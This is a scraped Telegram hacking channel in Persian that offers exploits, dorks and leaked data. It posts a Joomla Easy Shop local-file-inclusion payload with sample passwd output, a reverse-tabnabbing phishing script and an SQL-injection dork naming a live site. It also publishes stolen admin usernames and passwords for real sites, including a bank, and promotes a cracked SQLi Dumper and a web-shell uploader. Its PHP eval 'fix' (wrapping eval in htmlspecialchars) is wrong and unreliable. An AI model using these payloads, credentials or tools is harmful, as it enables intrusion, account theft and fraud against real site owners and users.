0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Pentesting With DVWA Part 2.rar
35.2 MB
#Pentesting Dvwa
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
🔰#PCI Php Code Injection #Vulnerable

❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
php injection bug.rar
13.5 MB
🔰#PCI Php Code Injection #Vulnerable

❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
🔰#PCI Php Code Injection #Vulnerable #Ptchor #Fix

❇️ نحوه ی **Fix** یا **Patch** باگ ❇️
این اسیب پذیری در موقعی رخ میدهد که یک برنامه نویسی از تابع
eval();
در php استفاده کند. مانند نمونه کد زیر :
$myvar = "varname";
$x = $_GET['Amir'];
eval("\$myvar = \$x;");

بازتاب ان در سایت :
[localhost]//index.php?Amir=1
برای اینکه امکان inject کردن کد های php نباشد شما میتوانید
از توابع زیر استفاده کنید :
▪️mysql_real_escape_string()
▪️htmlentities()
▪️htmlspecialchars()
▪️strip_tags()
▪️addslashes()
نحوه ی استفاده از اونا به برنامه نویس بستگی داره که معمولا به صورت :
eval(htmlspecialchars("\$myvar = \$x;"));
میباشد.
باتشکر

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
👍1
💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable

آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion

#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=‍‍‍

#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
‍`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`

اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php

بخشی از پاسخی که سایت برای ما برمیگردونه :
‍`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )

Software Link

⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
#Wordpress #Plugin #Wisechat <= V 2.6.3 - #Reverse #Tabnabbing - #Vulnerable #Vuln (Vulnerable)


آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :

Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing



Exploit :

<html>
<script>
if (window.opener) window.opener.parent.location.replace(' #Pishing Page');
if (window.parent != window) window.parent.location.replace('#Pishing Page');
</script>
Open Redirect TEST
</html>


🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1

2 - Pic_2


Demo WiseChat :
دمو پلاگین

About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...


++ > @LearnExploit <++
#About #Reverse #Tabnabbing #Vulnerable ::

برگه ی معکوس یا صفحه دزدی معکوس ::
Reverse Tabnabbing
نوعی صفحه دزدی است که در فهرست حمله های فیشینگ (Phishing) قرار می گیرد و در آن مهاجم به کمک
window.opener.location.assign()
صفحه ای قانونی و قابل اعتماد ایجاد می کند که در آن محتوی مخرب وجود دارد.

به طور خلاصه، در Reverse Tabnabbing وقتی بر روی یک لینک در صفحه وب کلیک می کنیم تا صفحه ای جدید باز شود و آن صفحه هم باز می شود اما وقتی که به صفحه قبلی باز می گردیم همه چیز به ظاهر عادی است اما در واقع پشت سر ما تغییراتی صورت گرفته و به وضوح می توان تغییر را در آدرس اینترنتی آن صفحه مشاهده کرد. اما بسیاری از کاربران متوجه تغییر در URL نمی شوند.

وقتی که به صفحه اصلی بر می گردیم، امکان دارد از ما خواسته شود که بار دیگر وارد حساب کاربری شویم. مهاجمان در واقع صفحه اصلی را با محتوی مخرب تعویض کرده اند، این تغییرات شامل فاویکون و نوار آدرس سایت می شود اما ما متوجه آن نمی شویم. اطلاعات کاربری مان را وارد کرده و هک می شویم.

🔰 demo Bug :
برای مشاهده ی نحوه ی کار کردن روی لینک کلیک کنید.
با تشکر از همراهی شما.

++ > @LearnExploit <++
#Dork - #SQLi (Structure Query Language Injection)
#WordPress - #Plugin - #PT_Content_Views_Pro v 2.1.2


🔰 #~Exploit Title :
WordPress PT-Content-Views-Pro Plugins 2.1.2 SQL Injection


🔰 #~Dork :
inurl:''/wp-content/plugins/pt-content-views-pro/''



🔰 #~Inpact :
/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=[SQL Injection]



🔰 #~Example :
happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27



🔰 #~db_Error:
Fatal error: Class 'PT_Content_Views_Admin' not found in /home/hhcnewserver/public_html/wp-content/plugins/pt-content-views-pro /admin/content-views-admin.php on line 12


🌐 Software Download Link
🌐 Software Information Link
با تشکر از دوستان

[+] T.me/LearnExploit
[-] 0Day.Today Boy's
دیتابیس سایت نیوتک
www.ontco.com
دانلود در پست بعد
#dgtalboy
@LearnExploit
vilayaa.com/index.php
user : admin & abhay
pass admin : Vila12161990
pass abhay : abhay@2435
#dgtalboy
@learnexploit
#Data #Base #User #Pass #Site

https://www.bankofbaroda.ug

یوزرنیم و پسورد ادمین ها در پست بعد

@LearnExploit
0Day.Today Boy’s
www.bankofbaroda.ug.txt
445 B
#Data #Base #User #Pass #Site

https://www.bankofbaroda.ug

یوزرنیم و پسورد ادمین ها

@LearnExploit
0Day.Today Boy’s
#Data #Base #User #Pass #Site

www.ghanatimber.org
یوزرنیم و پسورد ادمین
cms@manage010
a8266095acf1f51efe5ab22e34808a86

@LearnExploit
0Day.Today Boy’s
🔰 #Soft #SQLi_Dumper (SQLi Dumper Pro v 9.7)

دانلود برنامه SQLi Dumper برای کامپیوتر
ورژن برنامه : 9.7
کرک شده توسط : PC-RET
دانلود در پست بعدی

🔸 @LearnExploit 🔸
🔰 #Uploader #WebShell #PHP

نام : دانلود شل اپلودر
توضیحات : با استفاده از این شل میتوانید شل های پیشرفته ی خودتون رو در سایت اپلود کنید.

🔰 @LearnExploit